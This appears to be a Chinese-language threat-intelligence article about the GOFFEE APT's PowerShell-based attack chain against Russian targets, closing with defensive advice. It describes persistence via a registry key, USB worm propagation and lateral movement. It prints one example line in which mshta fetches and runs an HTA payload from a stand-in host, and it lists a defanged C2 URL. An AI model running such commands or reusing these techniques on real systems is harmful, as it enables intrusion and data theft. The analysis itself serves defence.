深度解析：GOFFEE APT 组织——针对俄罗斯的 PowerShell 攻击链演进

数据来源：GOFFEE’s recent attacks: new tools and techniques | Securelist （2025年4月10日）

事件概述：GOFFEE 的持续演进

自2022年首次被发现以来，GOFFEE 一直是一个高度专注于俄罗斯境内目标的高级持续性威胁（APT）组织。其攻击对象涵盖媒体、电信、政府、建筑和能源行业，具有明确的地缘政治指向性。

在2024年至2025年的最新攻击活动中，GOFFEE 展现出显著的技术演进：

从早期依赖篡改系统文件（如 explorer.exe），
到如今全面转向基于 PowerShell 的模块化攻击链，
并引入了一款名为 PowerModul 的新型 PowerShell 下载器，
同时逐步用二进制版 Mythic 代理取代原有的 PowerShell 植入物。

这一系列变化表明，GOFFEE 正在构建一个更灵活、更隐蔽、更易扩展的攻击框架，其战术成熟度已达到国家级APT水平。

初始入侵：双路径钓鱼策略

GOFFEE 的初始感染仍以鱼叉式钓鱼邮件为主，但已发展出两种并行的技术路径，显示出其攻击基础设施的多样性。

🔹 路径一：伪装成文档的“补丁化系统文件”

攻击者发送一个 RAR 压缩包，内含一个名为 document.pdf.exe 或 report.doc.exe 的可执行文件。
该文件实为合法的 Windows 系统程序（如 explorer.exe 或 xpsrchvw.exe），但其代码已被打补丁注入恶意 shellcode。

用户运行后，会下载一个看似正常的文档作为诱饵，掩盖恶意行为；
同时，注入的 shellcode 会立即激活一个Obfuscated PowerShell 版 Mythic 代理（PowerTaskel），与C2建立连接。

📌 攻击逻辑：
利用用户对“系统文件”的信任，绕过基础杀毒软件检测。由于文件哈希与原始系统文件接近，传统IOC检测难以奏效。

🔹 路径二：宏文档 + HTA + PowerShell 多层加载（2024年新策略）

这是 GOFFEE 在2024年引入的全新攻击链，技术更为复杂。

恶意 Word 文档包含一个 VBA 宏，打开时提示：“此文档由旧版 Office 创建，请点击‘启用内容’以正确显示”；
用户点击后，宏执行以下操作：
- 恢复文档内容（伪装成正常文件）；
- 在当前目录创建两个文件：UserCache.ini.hta 和 UserCache.ini；
- 将 HTA 路径写入注册表 HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows 的 LOAD 键，实现持久化自启。
HTA 文件通过 cmd.exe + echo 输出一个 JavaScript 文件（UserCacheHelper.lnk.js），再由该脚本启动 PowerShell 植入物 PowerModul。

⚠️ 技术亮点：
整个过程不直接调用 PowerShell，规避了常见的 PowerShell 审计策略，属于典型的“Living-off-the-Land”（白利用）攻击。

核心组件：PowerModul——新型 PowerShell 下载器

什么是 PowerModul？

PowerModul 是 GOFFEE 在2024年引入的一款轻量级 PowerShell 下载器（6.66KB），我们将其视为一个独立的恶意软件家族，而非 PowerTaskel 的附属组件。

主要功能：

连接C2服务器，接收并执行远程下发的 PowerShell 脚本；
支持多种载荷：PowerTaskel、FlashFileGrabber、USB Worm；
使用唯一通信协议，与 PowerTaskel 分离，增强隐蔽性。

通信机制：

C2地址格式：hxxp://62.113.114[.]117/api/texts/{计算机名}_{用户名}_{磁盘序列号}
响应为 XML 格式，包含 Base64 编码的脚本模块；
支持任务调度（<Interval> 和 <CountRuns> 字段）。

独特功能：`OfflineWorker()`

内置一个名为 OfflineWorker() 的函数，可解码并执行预定义的 Base64 字符串；
在某些样本中，该字符串包含 FlashFileGrabber 数据窃取工具，用于在无网络时执行本地任务；
表明 GOFFEE 具备“离线作业”能力，适应断网环境。

攻击载荷：三大 PowerShell 工具链

1. FlashFileGrabber：U盘文件窃取器

专用于窃取插入受害机的U盘或移动硬盘中的敏感文件。

扫描所有可移动设备；
复制特定扩展名的文件至 %TEMP%\CacheStore\connect\<卷序列号>\；
创建 ftree.db 记录文件元数据，避免重复拷贝；
使用 internal_profiles.db 记录已处理文件的 MD5，实现去重。

📌 目标文件类型：
涵盖办公文档（.doc/.xlsx）、工程文件（.dwg）、数据库（.mdb）、配置文件（.ovpn）等高价值数据。

🔍 与 FlashFileGrabberOffline 的区别：后者仅本地存储，而 FlashFileGrabber 可将文件上传至C2。

2. USB Worm：U盘传播蠕虫

GOFFEE 不仅窃取U盘数据，还会将U盘变成攻击跳板。

传播机制：

将U盘上的文件重命名为随机名（如 zermndzg.docx），并隐藏；
复制 UserCache.ini（PowerModul）到U盘；
创建 .bat 和 .vbs 脚本，用于静默运行 PowerModul；
创建快捷方式（.lnk），图标伪装成原始文件类型（如Word图标）；
用户点击“快捷方式”时，实际执行 .vbs → .bat → PowerShell → 植入新主机。

📌 社会工程设计精巧：
用户以为打开了原文件，实则触发了恶意链，极具欺骗性。

3. PowerTaskel：Mythic 框架的 PowerShell 实现

PowerTaskel 是 GOFFEE 自2023年起使用的主力后门，本质是 Mythic C2 框架的 PowerShell 版本。

核心能力：

向C2发送“心跳”（checkin）；
接收并执行远程命令或PowerShell脚本；
支持文件上传/下载、进程执行、注册表操作等。

通信特点：

请求体为 XML 序列化的 PowerShell 对象；
使用 单字节 XOR 加密 + Base64 编码；
极可能源自开源项目 Medusa Mythic Agent（Python版）。

📌 战术演进：
PowerTaskel 已不仅是独立后门，更成为加载二进制版 Mythic 代理的“跳板”，实现权限提升和横向移动。

横向移动：从 PowerShell 到二进制代理

GOFFEE 的横向移动策略体现了其从脚本化向专业化过渡的趋势。

1. 权限提升：利用 PsExec 实现 SYSTEM 权限

PowerTaskel 下载 Sysinternals PsExec 工具（重命名为 ntuser.exe 或 1cv9.exe）；
通过 PsExec 以 SYSTEM 权限启动 mshta.exe，并传入恶意 HTA URL；
HTA 中的 JScript 创建临时文件，最终加载 PowerTaskel 或新载荷，实现提权。

2. 网络横向移动：WinRM + HTA 注入

一旦获得高权限，GOFFEE 开始在内网扩散：

使用 WinRM（Windows Remote Management）服务远程执行命令；
目标主机上通过 wmiprvse.exe 或 wsmprovhost.exe 启动 mshta.exe，加载攻击者控制的 HTA；
HTA 再次触发 PowerModul 或二进制版 Mythic 代理，完成横向渗透。

# 典型攻击链示例：
wmiprvse.exe -> cmd.exe /C mshta.exe http://malicious[.]com/payload.hta

3. 转向二进制 Mythic 代理（关键演进）

GOFFEE 正在逐步弃用 PowerTaskel，转而使用自研的二进制版 Mythic 代理。

技术实现：

PowerTaskel 从C2下载一段自配置 shellcode；
通过辅助 DLL 将 shellcode 注入内存；
shellcode 解密并加载二进制代理，实现更稳定的远程控制。

HTA Polyglot 技术：

C2返回的 HTA 文件是一个多格式文件（Polyglot）：
- 前80%为 shellcode；
- 中间为两个 Base64 编码的 PowerShell 脚本；
- 结尾为 HTA 结构；
mshta.exe 解析时执行 JScript，逐步提取并执行各层载荷。

📌 目的：规避 EDR 对 PowerShell 的监控，转向更难检测的内存执行模式。

受害者画像与攻击动机

✅ 受害者特征：

地理位置：全部位于俄罗斯；
行业分布：媒体、电信、政府、建筑、能源；
语言环境：钓鱼邮件、文档均为俄语，针对性极强。

🔍 攻击动机推测：

情报收集：针对政府和能源企业，可能涉及战略情报；
供应链渗透：建筑与工程公司常参与国家项目，具备高价值数据；
长期潜伏：攻击模式强调隐蔽与持久，非短期破坏。

趋势洞察：GOFFEE 的三大演进方向

演进方向	具体表现
从二进制到脚本化	放弃自研恶意软件，转向 PowerShell + HTA + VBA 的“白利用”组合
从单一到模块化	PowerModul 作为下载器，可动态加载多种功能模块，灵活应对不同场景
从脚本到混合执行	最终回归二进制代理，结合脚本的灵活性与二进制的稳定性

这种“先用脚本绕过检测，再用二进制实现持久控制”的策略，已成为现代APT的标准范式。

防御建议

✅ 企业应采取的措施：

措施	说明
禁用 Office 宏	尤其是来自外部邮件的文档
监控注册表 LOAD 键	检测`HKCU\...\Windows\LOAD`的异常写入
限制 mshta.exe 和 cscript.exe	通过 AppLocker 或 Intune 策略控制其使用
审计 PowerShell 行为	启用脚本块日志（Script Block Logging）和模块日志
关闭 WinRM 外部访问	除非必要，否则禁用 WinRM 服务
加强U盘使用管理	禁止自动运行，限制可移动设备权限

✅ 个人用户建议：

不打开来源不明的 .doc 或 .pdf.exe 文件；
更新系统和 Office 补丁；
使用可靠的安全软件。

结语

GOFFEE 的攻击模式告诉我们：

今天的 APT，早已不是“高级病毒”，而是“高级工程”。

它不依赖0day漏洞，而是通过精心设计的脚本链、合法工具滥用、注册表持久化和U盘传播，构建出一条条难以察觉的攻击路径。其背后，是一个具备软件工程能力、C2框架开发经验和地缘情报支持的成熟攻击组织。

面对这类威胁，我们必须从“查杀病毒”转向“监控行为、理解战术、预测路径”的主动防御体系。唯有如此，才能在这场无声的网络战争中，守住我们的数字边疆。

分享